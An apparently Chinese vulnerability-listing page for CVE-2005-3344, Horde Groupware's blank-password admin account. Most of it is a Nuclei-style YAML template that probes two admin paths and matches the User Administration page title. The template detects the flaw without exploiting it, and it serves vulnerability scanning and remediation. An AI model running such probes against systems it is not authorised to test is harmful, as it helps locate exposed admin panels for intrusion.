CVE-2005-3344: Horde Groupware Unauthenticated Admin Access

日期: 2025-08-01 | 影响软件: Horde Groupware | POC: 已公开

漏洞描述

Horde Groupware contains an administrative account with a blank password, which allows remote attackers to gain access.

PoC代码[已公开]

id: CVE-2005-3344

info:
  name: Horde Groupware Unauthenticated Admin Access
  author: pikpikcu
  severity: critical
  description: Horde Groupware contains an administrative account with a blank password, which allows remote attackers to gain access.
  impact: |
    An attacker can gain unauthorized access to sensitive administrative functions and potentially compromise the entire system.
  remediation: |
    Apply the latest security patches or upgrade to a patched version of Horde Groupware to fix the vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2005-3344
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3344
    - http://www.debian.org/security/2005/dsa-884
    - http://www.networkscanning.com/Horde-Default-Admin-Password-Vulnerability-VSS_20171.html
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/24576
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C
    cvss-score: 10
    cve-id: CVE-2005-3344
    cwe-id: NVD-CWE-Other
    epss-score: 0.1015
    epss-percentile: 0.92793
    cpe: cpe:2.3:a:horde:horde:3.0.4:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: horde
    product: horde
  tags: cve2005,cve,horde,unauth,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/horde/admin/user.php"
      - "{{BaseURL}}/admin/user.php"

    headers:
      Content-Type: text/html

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<title>Horde :: User Administration</title>"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100810911451936fc7925f16ac33ecde0896b49397889396920c0e95ea789889c45022100d80130ad60b3648bae140c41fbe17cbdb3f54e49f097065b5ba93fbe413b0a15:922c64590222798bb761d5b6d8e72950

相关漏洞推荐